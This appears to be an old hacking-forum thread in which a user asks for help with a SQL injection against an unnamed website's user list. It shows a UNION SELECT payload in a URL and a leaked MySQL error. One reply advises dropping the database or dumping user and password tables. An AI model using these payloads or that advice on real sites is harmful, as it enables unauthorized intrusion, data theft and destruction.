Follow us on Twitter!
Understanding is the answer, hatred is the problem, and hackers are the slaves abused and destroyed in the process of peace online - Deshouleres
Wednesday, April 23, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 26
Guests Online: 16
Members Online: 10

Registered Members: 82882
Newest Member: imtheboss
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 18-09-05 07:47
Ok so I i know a website thats has XSS.

Code
www.something.com/view_user.php?list=1&letter=&sort_by=' [SQL injection]




Ok so I try this:

Code
www.something.com/view_user.php?list=1&letter=&sort_by=' UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--


and i hit enter

it gives me this error:

Code
Invalid SQL query: SELECT u.*, m.mana FROM wowbb_users u LEFT JOIN wowbb_manas m USING (user_id) WHERE user_activation_key = '' ORDER BY , u.user_name LIMIT 0, 40-You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ' u.user_name LIMIT 0, 40' at line 1




and i know the usenames are in wowbb_users,
I am confused. Please help me

Edited by on 18-09-05 07:49
Author

RE: SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-09-05 23:13
so what is it no one here knows what that means? Help
Author

RE: SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 21-09-05 23:59
well wut is saying (in lamen terms):
go into database "wowbb_users" and select the user m.mana


i suppose that is wut it means, the rest is just the actual error in joining things together.. from here u can do a DROP command and drop everything in the database or read out the users in "wowbb_users" and then hopefully get the password table name by doing a table name search.


Edit:
Oh yea almost forgot, this information cud have been easily retreaved via www.google.com

www.fuckinggoogleit.com




Edited by on 22-09-05 00:00
Author

RE: SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-09-05 01:23
well thanks I know i was looking it up on google but I couldn't find anything.
Well thanks again
Author

RE: SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-09-05 02:02
Just to let you know, that'd be SQL injection, not XSS. I know you meant sql injection, but just thought I'd point that out.


Author

RE: SQL injection problem


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 22-09-05 23:05
thanks dude